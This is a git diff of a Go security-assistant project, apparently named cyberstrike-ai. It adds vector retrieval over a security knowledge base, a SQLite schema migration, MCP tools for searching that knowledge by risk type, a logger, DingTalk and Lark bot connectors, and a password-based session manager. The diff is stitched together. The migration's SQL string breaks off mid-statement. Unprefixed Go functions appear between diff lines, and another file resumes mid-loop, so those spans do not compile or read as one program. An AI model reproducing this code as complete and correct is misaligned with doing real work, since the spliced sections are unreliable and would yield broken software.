+ if err != nil { + return nil, fmt.Errorf("查询向量失败: %w", err) + } + defer rows.Close() + + type candidate struct { + chunk *KnowledgeChunk + item *KnowledgeItem + similarity float64 + } + + candidates := make([]candidate, 0) + rowNum := 0 + for rows.Next() { + rowNum++ + if rowNum%48 == 0 { + select { + case <-ctx.Done(): + return nil, ctx.Err() + default: + } + } + + var chunkID, itemID, chunkText, embeddingJSON, category, title, rowModel string + var chunkIndex, rowDim int + + if err := rows.Scan(&chunkID, &itemID, &chunkIndex, &chunkText, &embeddingJSON, &rowModel, &rowDim, &category, &title); err != nil { + r.logger.Warn("扫描向量失败", zap.Error(err)) + continue + } + + var embedding []float32 + if err := json.Unmarshal([]byte(embeddingJSON), &embedding); err != nil { + r.logger.Warn("解析向量失败", zap.Error(err)) + continue + } + + if rowDim > 0 && len(embedding) != rowDim { + r.logger.Debug("跳过维度不一致的向量行", zap.String("chunkId", chunkID), zap.Int("rowDim", rowDim), zap.Int("got", len(embedding))) + continue + } + if queryDim > 0 && len(embedding) != queryDim { + r.logger.Debug("跳过与查询维度不一致的向量", zap.String("chunkId", chunkID), zap.Int("queryDim", queryDim), zap.Int("got", len(embedding))) + continue + } + if expectedModel != "" && strings.TrimSpace(rowModel) != "" && strings.TrimSpace(rowModel) != expectedModel { + r.logger.Debug("跳过嵌入模型不一致的行", zap.String("chunkId", chunkID), zap.String("rowModel", rowModel), zap.String("expected", expectedModel)) + continue + } + + similarity := cosineSimilarity(queryEmbedding, embedding) + candidates = append(candidates, candidate{ + chunk: &KnowledgeChunk{ + ID: chunkID, + ItemID: itemID, + ChunkIndex: chunkIndex, + ChunkText: chunkText, + Embedding: embedding, + }, + item: &KnowledgeItem{ + ID: itemID, + Category: category, + Title: title, + }, + similarity: similarity, + }) + } + + sort.Slice(candidates, func(i, j int) bool { + return candidates[i].similarity > candidates[j].similarity + }) + + filtered := make([]candidate, 0, 
len(candidates)) + for _, c := range candidates { + if c.similarity >= threshold { + filtered = append(filtered, c) + } + } + + if len(filtered) > topK { + filtered = filtered[:topK] + } + + results := make([]*RetrievalResult, len(filtered)) + for i, c := range filtered { + results[i] = &RetrievalResult{ + Chunk: c.chunk, + Item: c.item, + Similarity: c.similarity, + Score: c.similarity, + } + } + return results, nil +} + +// AsEinoRetriever 将纯向量检索暴露为 Eino [retriever.Retriever]。 +func (r *Retriever) AsEinoRetriever() retriever.Retriever { + return NewVectorEinoRetriever(r) +} diff --git a/knowledge/schema_migrate.go b/knowledge/schema_migrate.go new file mode 100644 index 00000000..85fd26e2 --- /dev/null +++ b/knowledge/schema_migrate.go @@ -0,0 +1,51 @@ +package knowledge + +import ( + "database/sql" + "fmt" +) + +// EnsureKnowledgeEmbeddingsSchema migrates knowledge_embeddings for sub_indexes + embedding metadata. +func EnsureKnowledgeEmbeddingsSchema(db *sql.DB) error { + if db == nil { + return fmt.Errorf("db is nil") + } + var n int + if err := db.QueryRow(`SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name='knowledge_embeddings'`).Scan(&n); err != nil { + return err + } + if n == 0 { + return nil + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "sub_indexes", + `ALTER TABLE knowledge_embeddings ADD COLUMN sub_indexes TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_model", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_model TEXT NOT NULL DEFAULT ''`); err != nil { + return err + } + if err := addKnowledgeEmbeddingsColumnIfMissing(db, "embedding_dim", + `ALTER TABLE knowledge_embeddings ADD COLUMN embedding_dim INTEGER NOT NULL DEFAULT 0`); err != nil { + return err + } + return nil +} + +func addKnowledgeEmbeddingsColumnIfMissing(db *sql.DB, column, alterSQL string) error { + var colCount int + q := `SELECT COUNT(*) FROM 
// ensureKnowledgeEmbeddingsSubIndexesColumn is kept for backward compatibility.
// It only delegates to [EnsureKnowledgeEmbeddingsSchema] and returns its error
// unchanged; new code should call [EnsureKnowledgeEmbeddingsSchema] directly.
func ensureKnowledgeEmbeddingsSubIndexesColumn(db *sql.DB) error {
	return EnsureKnowledgeEmbeddingsSchema(db)
}
categories { + resultText.WriteString(fmt.Sprintf("%d. %s\n", i+1, category)) + } + resultText.WriteString("\n提示:在调用 " + builtin.ToolSearchKnowledgeBase + " 工具时,可以使用上述风险类型之一作为 risk_type 参数,以缩小搜索范围并提高检索效率。") + + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: resultText.String(), + }, + }, + }, nil + } + + mcpServer.RegisterTool(listRiskTypesTool, listRiskTypesHandler) + logger.Info("风险类型列表工具已注册", zap.String("toolName", listRiskTypesTool.Name)) + + // 注册第二个工具:搜索知识库(保持原有功能) + searchTool := mcp.Tool{ + Name: builtin.ToolSearchKnowledgeBase, + Description: "在知识库中搜索相关的安全知识。当你需要了解特定漏洞类型、攻击技术、检测方法等安全知识时,可以使用此工具进行检索。工具基于向量嵌入与余弦相似度检索(与 Eino retriever 语义一致)。建议:在搜索前可以先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型,然后使用正确的 risk_type 参数进行精确搜索,这样可以大幅减少检索时间。", + ShortDescription: "搜索知识库中的安全知识(向量语义检索)", + InputSchema: map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "query": map[string]interface{}{ + "type": "string", + "description": "搜索查询内容,描述你想要了解的安全知识主题", + }, + "risk_type": map[string]interface{}{ + "type": "string", + "description": "可选:指定风险类型(如:SQL注入、XSS、文件上传等)。建议先调用 " + builtin.ToolListKnowledgeRiskTypes + " 工具获取可用的风险类型列表,然后使用正确的风险类型进行精确搜索,这样可以大幅减少检索时间。如果不指定则搜索所有类型。", + }, + }, + "required": []string{"query"}, + }, + } + + searchHandler := func(ctx context.Context, args map[string]interface{}) (*mcp.ToolResult, error) { + query, ok := args["query"].(string) + if !ok || query == "" { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: "错误: 查询参数不能为空", + }, + }, + IsError: true, + }, nil + } + + riskType := "" + if rt, ok := args["risk_type"].(string); ok && rt != "" { + riskType = rt + } + + logger.Info("执行知识库检索", + zap.String("query", query), + zap.String("riskType", riskType), + ) + + // 检索统一走 Retriever.Search → VectorEinoRetriever(Eino retriever 语义)。 + searchReq := &SearchRequest{ + Query: query, + RiskType: riskType, + TopK: 5, + } + + results, err := 
retriever.Search(ctx, searchReq) + if err != nil { + logger.Error("知识库检索失败", zap.Error(err)) + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("检索失败: %v", err), + }, + }, + IsError: true, + }, nil + } + + if len(results) == 0 { + return &mcp.ToolResult{ + Content: []mcp.Content{ + { + Type: "text", + Text: fmt.Sprintf("未找到与查询 '%s' 相关的知识。建议:\n1. 尝试使用不同的关键词\n2. 检查风险类型是否正确\n3. 确认知识库中是否包含相关内容", query), + }, + }, + }, nil + } + + // 格式化结果 + var resultText strings.Builder + + // 按余弦相似度(Score)降序 + sort.Slice(results, func(i, j int) bool { + return results[i].Score > results[j].Score + }) + + // 按文档分组结果,以便更好地展示上下文 + type itemGroup struct { + itemID string + results []*RetrievalResult + maxScore float64 // 该文档块的最高相似度 + } + itemGroups := make([]*itemGroup, 0) + itemMap := make(map[string]*itemGroup) + + for _, result := range results { + itemID := result.Item.ID + group, exists := itemMap[itemID] + if !exists { + group = &itemGroup{ + itemID: itemID, + results: make([]*RetrievalResult, 0), + maxScore: result.Score, + } + itemMap[itemID] = group + itemGroups = append(itemGroups, group) + } + group.results = append(group.results, result) + if result.Score > group.maxScore { + group.maxScore = result.Score + } + } + + // 按文档内最高相似度排序 + sort.Slice(itemGroups, func(i, j int) bool { + return itemGroups[i].maxScore > itemGroups[j].maxScore + }) + + // 收集检索到的知识项ID(用于日志) + retrievedItemIDs := make([]string, 0, len(itemGroups)) + + resultText.WriteString(fmt.Sprintf("找到 %d 条相关知识片段:\n\n", len(results))) + + resultIndex := 1 + for _, group := range itemGroups { + itemResults := group.results + mainResult := itemResults[0] + maxScore := mainResult.Score + for _, result := range itemResults { + if result.Score > maxScore { + maxScore = result.Score + mainResult = result + } + } + + // 按chunk_index排序,保证阅读的逻辑顺序(文档的原始顺序) + sort.Slice(itemResults, func(i, j int) bool { + return itemResults[i].Chunk.ChunkIndex < itemResults[j].Chunk.ChunkIndex + }) + + 
// contains reports whether item is an element of slice.
// A nil or empty slice contains nothing.
func contains(slice []string, item string) bool {
	for i := 0; i < len(slice); i++ {
		if slice[i] == item {
			return true
		}
	}
	return false
}
return +} + +// FormatRetrievalResults 格式化检索结果为字符串(用于日志) +func FormatRetrievalResults(results []*RetrievalResult) string { + if len(results) == 0 { + return "未找到相关结果" + } + + var builder strings.Builder + builder.WriteString(fmt.Sprintf("检索到 %d 条结果:\n", len(results))) + + itemIDs := make(map[string]bool) + for i, result := range results { + builder.WriteString(fmt.Sprintf("%d. [%s] %s (相似度: %.2f%%)\n", + i+1, result.Item.Category, result.Item.Title, result.Similarity*100)) + itemIDs[result.Item.ID] = true + } + + // 返回知识项ID列表(JSON格式) + ids := make([]string, 0, len(itemIDs)) + for id := range itemIDs { + ids = append(ids, id) + } + idsJSON, _ := json.Marshal(ids) + builder.WriteString(fmt.Sprintf("\n检索到的知识项ID: %s", string(idsJSON))) + + return builder.String() +} diff --git a/knowledge/types.go b/knowledge/types.go new file mode 100644 index 00000000..42e35e76 --- /dev/null +++ b/knowledge/types.go @@ -0,0 +1,123 @@ +package knowledge + +import ( + "encoding/json" + "time" +) + +// formatTime 格式化时间为 RFC3339 格式,零时间返回空字符串 +func formatTime(t time.Time) string { + if t.IsZero() { + return "" + } + return t.Format(time.RFC3339) +} + +// KnowledgeItem 知识库项 +type KnowledgeItem struct { + ID string `json:"id"` + Category string `json:"category"` // 风险类型(文件夹名) + Title string `json:"title"` // 标题(文件名) + FilePath string `json:"filePath"` // 文件路径 + Content string `json:"content"` // 文件内容 + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// KnowledgeItemSummary 知识库项摘要(用于列表,不包含完整内容) +type KnowledgeItemSummary struct { + ID string `json:"id"` + Category string `json:"category"` + Title string `json:"title"` + FilePath string `json:"filePath"` + Content string `json:"content,omitempty"` // 可选:内容预览(如果提供,通常只包含前 150 字符) + CreatedAt time.Time `json:"createdAt"` + UpdatedAt time.Time `json:"updatedAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItemSummary) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItemSummary + aux := 
&struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (k *KnowledgeItem) MarshalJSON() ([]byte, error) { + type Alias KnowledgeItem + aux := &struct { + *Alias + CreatedAt string `json:"createdAt"` + UpdatedAt string `json:"updatedAt"` + }{ + Alias: (*Alias)(k), + } + aux.CreatedAt = formatTime(k.CreatedAt) + aux.UpdatedAt = formatTime(k.UpdatedAt) + return json.Marshal(aux) +} + +// KnowledgeChunk 知识块(用于向量化) +type KnowledgeChunk struct { + ID string `json:"id"` + ItemID string `json:"itemId"` + ChunkIndex int `json:"chunkIndex"` + ChunkText string `json:"chunkText"` + Embedding []float32 `json:"-"` // 向量嵌入,不序列化到 JSON + CreatedAt time.Time `json:"createdAt"` +} + +// RetrievalResult 检索结果 +type RetrievalResult struct { + Chunk *KnowledgeChunk `json:"chunk"` + Item *KnowledgeItem `json:"item"` + Similarity float64 `json:"similarity"` // 相似度分数 + Score float64 `json:"score"` // 与 Similarity 相同:余弦相似度 +} + +// RetrievalLog 检索日志 +type RetrievalLog struct { + ID string `json:"id"` + ConversationID string `json:"conversationId,omitempty"` + MessageID string `json:"messageId,omitempty"` + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` + RetrievedItems []string `json:"retrievedItems"` // 检索到的知识项 ID 列表 + CreatedAt time.Time `json:"createdAt"` +} + +// MarshalJSON 自定义 JSON 序列化,确保时间格式正确 +func (r *RetrievalLog) MarshalJSON() ([]byte, error) { + type Alias RetrievalLog + return json.Marshal(&struct { + *Alias + CreatedAt string `json:"createdAt"` + }{ + Alias: (*Alias)(r), + CreatedAt: formatTime(r.CreatedAt), + }) +} + +// CategoryWithItems 分类及其下的知识项(用于按分类分页) +type CategoryWithItems struct { + Category string `json:"category"` // 分类名称 + ItemCount int `json:"itemCount"` // 该分类下的知识项总数 + Items []*KnowledgeItemSummary 
`json:"items"` // 该分类下的知识项列表 +} + +// SearchRequest 搜索请求 +type SearchRequest struct { + Query string `json:"query"` + RiskType string `json:"riskType,omitempty"` // 可选:指定风险类型 + SubIndexFilter string `json:"subIndexFilter,omitempty"` // 可选:仅保留 sub_indexes 含该标签的行(含未打标旧数据) + TopK int `json:"topK,omitempty"` // 返回 Top-K 结果,默认 5 + Threshold float64 `json:"threshold,omitempty"` // 相似度阈值,默认 0.7 +} diff --git a/logger/logger.go b/logger/logger.go new file mode 100644 index 00000000..7e306fab --- /dev/null +++ b/logger/logger.go @@ -0,0 +1,68 @@ +package logger + +import ( + "os" + + "go.uber.org/zap" + "go.uber.org/zap/zapcore" +) + +type Logger struct { + *zap.Logger +} + +func New(level, output string) *Logger { + var zapLevel zapcore.Level + switch level { + case "debug": + zapLevel = zapcore.DebugLevel + case "info": + zapLevel = zapcore.InfoLevel + case "warn": + zapLevel = zapcore.WarnLevel + case "error": + zapLevel = zapcore.ErrorLevel + default: + zapLevel = zapcore.InfoLevel + } + + config := zap.NewProductionConfig() + config.Level = zap.NewAtomicLevelAt(zapLevel) + config.EncoderConfig.TimeKey = "timestamp" + config.EncoderConfig.EncodeTime = zapcore.ISO8601TimeEncoder + + var writeSyncer zapcore.WriteSyncer + if output == "stdout" { + writeSyncer = zapcore.AddSync(os.Stdout) + } else { + file, err := os.OpenFile(output, os.O_CREATE|os.O_WRONLY|os.O_APPEND, 0666) + if err != nil { + writeSyncer = zapcore.AddSync(os.Stdout) + } else { + writeSyncer = zapcore.AddSync(file) + } + } + + core := zapcore.NewCore( + zapcore.NewJSONEncoder(config.EncoderConfig), + writeSyncer, + zapLevel, + ) + + logger := zap.New(core, zap.AddCaller(), zap.AddStacktrace(zapcore.ErrorLevel)) + + return &Logger{Logger: logger} +} + +func (l *Logger) Fatal(msg string, fields ...interface{}) { + zapFields := make([]zap.Field, 0, len(fields)) + for _, f := range fields { + switch v := f.(type) { + case error: + zapFields = append(zapFields, zap.Error(v)) + default: + zapFields = 
append(zapFields, zap.Any("field", v)) + } + } + l.Logger.Fatal(msg, zapFields...) +} diff --git a/robot/conn.go b/robot/conn.go new file mode 100644 index 00000000..d57e361d --- /dev/null +++ b/robot/conn.go @@ -0,0 +1,6 @@ +package robot + +// MessageHandler 供飞书/钉钉长连接调用的消息处理接口(由 handler.RobotHandler 实现) +type MessageHandler interface { + HandleMessage(platform, userID, text string) string +} diff --git a/robot/ding.go b/robot/ding.go new file mode 100644 index 00000000..7f469808 --- /dev/null +++ b/robot/ding.go @@ -0,0 +1,151 @@ +package robot + +import ( + "bytes" + "context" + "encoding/json" + "net/http" + "strings" + "time" + + "cyberstrike-ai/internal/config" + + "github.com/open-dingtalk/dingtalk-stream-sdk-go/chatbot" + "github.com/open-dingtalk/dingtalk-stream-sdk-go/client" + dingutils "github.com/open-dingtalk/dingtalk-stream-sdk-go/utils" + "go.uber.org/zap" +) + +const ( + dingReconnectInitial = 5 * time.Second // 首次重连间隔 + dingReconnectMax = 60 * time.Second // 最大重连间隔 +) + +// StartDing 启动钉钉 Stream 长连接(无需公网),收到消息后调用 handler 并通过 SessionWebhook 回复。 +// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。 +func StartDing(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger *zap.Logger) { + cfg := robotsCfg.Dingtalk + if !cfg.Enabled || cfg.ClientID == "" || cfg.ClientSecret == "" { + return + } + go runDingLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger) +} + +// runDingLoop 循环维持钉钉长连接:断开且 ctx 未取消时按退避间隔重连。 +func runDingLoop(ctx context.Context, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + backoff := dingReconnectInitial + for { + streamClient := client.NewStreamClient( + client.WithAppCredential(client.NewAppCredentialConfig(cfg.ClientID, cfg.ClientSecret)), + client.WithSubscription(dingutils.SubscriptionTypeKCallback, "/v1.0/im/bot/messages/get", + chatbot.NewDefaultChatBotFrameHandler(func(ctx context.Context, msg *chatbot.BotCallbackDataModel) ([]byte, error) 
{ + go handleDingMessage(ctx, msg, cfg, strictUserIdentity, h, logger) + return nil, nil + }).OnEventReceived), + ) + logger.Info("钉钉 Stream 正在连接…", zap.String("client_id", cfg.ClientID)) + err := streamClient.Start(ctx) + if ctx.Err() != nil { + logger.Info("钉钉 Stream 已按配置重启关闭") + return + } + if err != nil { + logger.Warn("钉钉 Stream 长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff)) + } + select { + case <-ctx.Done(): + return + case <-time.After(backoff): + // 下次重连间隔递增,上限 60 秒,避免频繁重试 + if backoff < dingReconnectMax { + backoff *= 2 + if backoff > dingReconnectMax { + backoff = dingReconnectMax + } + } + } + } +} + +func handleDingMessage(ctx context.Context, msg *chatbot.BotCallbackDataModel, cfg config.RobotDingtalkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + if msg == nil || msg.SessionWebhook == "" { + return + } + content := "" + if msg.Text.Content != "" { + content = strings.TrimSpace(msg.Text.Content) + } + if content == "" && msg.Msgtype == "richText" { + if cMap, ok := msg.Content.(map[string]interface{}); ok { + if rich, ok := cMap["richText"].([]interface{}); ok { + for _, c := range rich { + if m, ok := c.(map[string]interface{}); ok { + if txt, ok := m["text"].(string); ok { + content = strings.TrimSpace(txt) + break + } + } + } + } + } + } + if content == "" { + logger.Debug("钉钉消息内容为空,已忽略", zap.String("msgtype", msg.Msgtype)) + return + } + logger.Info("钉钉收到消息", zap.String("sender", msg.SenderId), zap.String("content", content)) + tenantKey := strings.TrimSpace(cfg.ClientID) + if tenantKey == "" { + tenantKey = "default" + } + userID := strings.TrimSpace(msg.SenderId) + if userID != "" { + userID = "t:" + tenantKey + "|u:" + userID + } else if cfg.AllowConversationIDFallback && !strictUserIdentity { + conversationID := strings.TrimSpace(msg.ConversationId) + if conversationID != "" { + userID = "t:" + tenantKey + "|c:" + conversationID + } + } + if userID == "" { + 
logger.Warn("钉钉消息缺少可用用户标识,已忽略") + return + } + reply := h.HandleMessage("dingtalk", userID, content) + // 使用 markdown 类型以便正确展示标题、列表、代码块等格式 + title := reply + if idx := strings.IndexAny(reply, "\n"); idx > 0 { + title = strings.TrimSpace(reply[:idx]) + } + if len(title) > 50 { + title = title[:50] + "…" + } + if title == "" { + title = "回复" + } + body := map[string]interface{}{ + "msgtype": "markdown", + "markdown": map[string]string{ + "title": title, + "text": reply, + }, + } + bodyBytes, _ := json.Marshal(body) + req, err := http.NewRequestWithContext(ctx, http.MethodPost, msg.SessionWebhook, bytes.NewReader(bodyBytes)) + if err != nil { + logger.Warn("钉钉构造回复请求失败", zap.Error(err)) + return + } + req.Header.Set("Content-Type", "application/json") + resp, err := http.DefaultClient.Do(req) + if err != nil { + logger.Warn("钉钉回复请求失败", zap.Error(err)) + return + } + defer resp.Body.Close() + if resp.StatusCode != http.StatusOK { + logger.Warn("钉钉回复非 200", zap.Int("status", resp.StatusCode)) + return + } + logger.Debug("钉钉回复成功", zap.String("content_preview", reply)) +} diff --git a/robot/lark.go b/robot/lark.go new file mode 100644 index 00000000..2cda0601 --- /dev/null +++ b/robot/lark.go @@ -0,0 +1,141 @@ +package robot + +import ( + "context" + "encoding/json" + "strings" + "time" + + "cyberstrike-ai/internal/config" + + lark "github.com/larksuite/oapi-sdk-go/v3" + larkcore "github.com/larksuite/oapi-sdk-go/v3/core" + "github.com/larksuite/oapi-sdk-go/v3/event/dispatcher" + larkim "github.com/larksuite/oapi-sdk-go/v3/service/im/v1" + larkws "github.com/larksuite/oapi-sdk-go/v3/ws" + "go.uber.org/zap" +) + +const ( + larkReconnectInitial = 5 * time.Second // 首次重连间隔 + larkReconnectMax = 60 * time.Second // 最大重连间隔 +) + +type larkTextContent struct { + Text string `json:"text"` +} + +// StartLark 启动飞书长连接(无需公网),收到消息后调用 handler 并回复。 +// 断线(如笔记本睡眠、网络中断)后会自动重连;ctx 被取消时退出,便于配置变更时重启。 +func StartLark(ctx context.Context, robotsCfg config.RobotsConfig, h MessageHandler, logger 
*zap.Logger) { + cfg := robotsCfg.Lark + if !cfg.Enabled || cfg.AppID == "" || cfg.AppSecret == "" { + return + } + go runLarkLoop(ctx, cfg, robotsCfg.Session.StrictUserIdentityEnabled(), h, logger) +} + +// runLarkLoop 循环维持飞书长连接:断开且 ctx 未取消时按退避间隔重连。 +func runLarkLoop(ctx context.Context, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, logger *zap.Logger) { + backoff := larkReconnectInitial + for { + larkClient := lark.NewClient(cfg.AppID, cfg.AppSecret) + eventHandler := dispatcher.NewEventDispatcher("", "").OnP2MessageReceiveV1(func(ctx context.Context, event *larkim.P2MessageReceiveV1) error { + go handleLarkMessage(ctx, event, cfg, strictUserIdentity, h, larkClient, logger) + return nil + }) + wsClient := larkws.NewClient(cfg.AppID, cfg.AppSecret, + larkws.WithEventHandler(eventHandler), + larkws.WithLogLevel(larkcore.LogLevelInfo), + ) + logger.Info("飞书长连接正在连接…", zap.String("app_id", cfg.AppID)) + err := wsClient.Start(ctx) + if ctx.Err() != nil { + logger.Info("飞书长连接已按配置重启关闭") + return + } + if err != nil { + logger.Warn("飞书长连接断开(如睡眠/断网),将自动重连", zap.Error(err), zap.Duration("retry_after", backoff)) + } + select { + case <-ctx.Done(): + return + case <-time.After(backoff): + if backoff < larkReconnectMax { + backoff *= 2 + if backoff > larkReconnectMax { + backoff = larkReconnectMax + } + } + } + } +} + +func handleLarkMessage(ctx context.Context, event *larkim.P2MessageReceiveV1, cfg config.RobotLarkConfig, strictUserIdentity bool, h MessageHandler, client *lark.Client, logger *zap.Logger) { + if event == nil || event.Event == nil || event.Event.Message == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil { + return + } + msg := event.Event.Message + msgType := larkcore.StringValue(msg.MessageType) + if msgType != larkim.MsgTypeText { + logger.Debug("飞书暂仅处理文本消息", zap.String("msg_type", msgType)) + return + } + var textBody larkTextContent + if err := json.Unmarshal([]byte(larkcore.StringValue(msg.Content)), 
&textBody); err != nil { + logger.Warn("飞书消息 Content 解析失败", zap.Error(err)) + return + } + text := strings.TrimSpace(textBody.Text) + if text == "" { + return + } + userID := resolveLarkUserID(event, cfg.AllowChatIDFallback && !strictUserIdentity) + if userID == "" { + logger.Warn("飞书消息缺少可用用户标识,已忽略") + return + } + messageID := larkcore.StringValue(msg.MessageId) + reply := h.HandleMessage("lark", userID, text) + contentBytes, _ := json.Marshal(larkTextContent{Text: reply}) + _, err := client.Im.Message.Reply(ctx, larkim.NewReplyMessageReqBuilder(). + MessageId(messageID). + Body(larkim.NewReplyMessageReqBodyBuilder(). + MsgType(larkim.MsgTypeText). + Content(string(contentBytes)). + Build()). + Build()) + if err != nil { + logger.Warn("飞书回复失败", zap.String("message_id", messageID), zap.Error(err)) + return + } + logger.Debug("飞书已回复", zap.String("message_id", messageID)) +} + +// resolveLarkUserID 提取飞书会话隔离键: +// tenant_key + 稳定用户标识(user_id/open_id/union_id);按配置可选 chat_id 兜底。 +func resolveLarkUserID(event *larkim.P2MessageReceiveV1, allowChatIDFallback bool) string { + if event == nil || event.Event == nil || event.Event.Sender == nil || event.Event.Sender.SenderId == nil { + return "" + } + tenantKey := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.TenantKey)) + if tenantKey == "" { + tenantKey = "default" + } + prefix := "t:" + tenantKey + "|" + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UserId)); id != "" { + return prefix + "u:" + id + } + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.OpenId)); id != "" { + return prefix + "o:" + id + } + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Sender.SenderId.UnionId)); id != "" { + return prefix + "n:" + id + } + if allowChatIDFallback && event.Event.Message != nil { + if id := strings.TrimSpace(larkcore.StringValue(event.Event.Message.ChatId)); id != "" { + return prefix + "c:" + id + } + } + return "" +} diff --git 
a/security/auth_manager.go b/security/auth_manager.go new file mode 100644 index 00000000..3b9bd17b --- /dev/null +++ b/security/auth_manager.go @@ -0,0 +1,132 @@ +package security + +import ( + "errors" + "strings" + "sync" + "time" + + "github.com/google/uuid" +) + +// Predefined errors for authentication operations. +var ( + ErrInvalidPassword = errors.New("invalid password") +) + +// Session represents an authenticated user session. +type Session struct { + Token string + ExpiresAt time.Time +} + +// AuthManager manages password-based authentication and session lifecycle. +type AuthManager struct { + password string + sessionDuration time.Duration + + mu sync.RWMutex + sessions map[string]Session +} + +// NewAuthManager creates a new AuthManager instance. +func NewAuthManager(password string, sessionDurationHours int) (*AuthManager, error) { + if strings.TrimSpace(password) == "" { + return nil, errors.New("auth password must be configured") + } + + if sessionDurationHours <= 0 { + sessionDurationHours = 12 + } + + return &AuthManager{ + password: password, + sessionDuration: time.Duration(sessionDurationHours) * time.Hour, + sessions: make(map[string]Session), + }, nil +} + +// Authenticate validates the password and creates a new session. +func (a *AuthManager) Authenticate(password string) (string, time.Time, error) { + if password != a.password { + return "", time.Time{}, ErrInvalidPassword + } + + token := uuid.NewString() + expiresAt := time.Now().Add(a.sessionDuration) + + a.mu.Lock() + a.sessions[token] = Session{ + Token: token, + ExpiresAt: expiresAt, + } + a.mu.Unlock() + + return token, expiresAt, nil +} + +// ValidateToken checks whether the provided token is still valid. 
+func (a *AuthManager) ValidateToken(token string) (Session, bool) { + if strings.TrimSpace(token) == "" { + return Session{}, false + } + + a.mu.RLock() + session, ok := a.sessions[token] + a.mu.RUnlock() + if !ok { + return Session{}, false + } + + if time.Now().After(session.ExpiresAt) { + a.mu.Lock() + delete(a.sessions, token) + a.mu.Unlock() + return Session{}, false + } + + return session, true +} + +// CheckPassword verifies whether the provided password matches the current password. +func (a *AuthManager) CheckPassword(password string) bool { + a.mu.RLock() + defer a.mu.RUnlock() + return password == a.password +} + +// RevokeToken invalidates the specified token. +func (a *AuthManager) RevokeToken(token string) { + if strings.TrimSpace(token) == "" { + return + } + + a.mu.Lock() + delete(a.sessions, token) + a.mu.Unlock() +} + +// SessionDurationHours returns the configured session duration in hours. +func (a *AuthManager) SessionDurationHours() int { + return int(a.sessionDuration / time.Hour) +} + +// UpdateConfig updates the password and session duration, revoking existing sessions. 
+func (a *AuthManager) UpdateConfig(password string, sessionDurationHours int) error { + password = strings.TrimSpace(password) + if password == "" { + return errors.New("auth password must be configured") + } + + if sessionDurationHours <= 0 { + sessionDurationHours = 12 + } + + a.mu.Lock() + defer a.mu.Unlock() + + a.password = password + a.sessionDuration = time.Duration(sessionDurationHours) * time.Hour + a.sessions = make(map[string]Session) + return nil +} diff --git a/security/auth_middleware.go b/security/auth_middleware.go new file mode 100644 index 00000000..e7924a7a --- /dev/null +++ b/security/auth_middleware.go @@ -0,0 +1,51 @@ +package security + +import ( + "net/http" + "strings" + + "github.com/gin-gonic/gin" +) + +const ( + ContextAuthTokenKey = "authToken" + ContextSessionExpiry = "authSessionExpiry" +) + +// AuthMiddleware enforces authentication on protected routes. +func AuthMiddleware(manager *AuthManager) gin.HandlerFunc { + return func(c *gin.Context) { + token := extractTokenFromRequest(c) + session, ok := manager.ValidateToken(token) + if !ok { + c.AbortWithStatusJSON(http.StatusUnauthorized, gin.H{ + "error": "未授权访问,请先登录", + }) + return + } + + c.Set(ContextAuthTokenKey, session.Token) + c.Set(ContextSessionExpiry, session.ExpiresAt) + c.Next() + } +} + +func extractTokenFromRequest(c *gin.Context) string { + authHeader := c.GetHeader("Authorization") + if authHeader != "" { + if len(authHeader) > 7 && strings.EqualFold(authHeader[0:7], "Bearer ") { + return strings.TrimSpace(authHeader[7:]) + } + return strings.TrimSpace(authHeader) + } + + if token := c.Query("token"); token != "" { + return strings.TrimSpace(token) + } + + if cookie, err := c.Cookie("auth_token"); err == nil { + return strings.TrimSpace(cookie) + } + + return "" +} diff --git a/security/executor.go b/security/executor.go new file mode 100644 index 00000000..9ce8e066 --- /dev/null +++ b/security/executor.go @@ -0,0 +1,1597 @@ +package security + +import ( + "bufio" + 
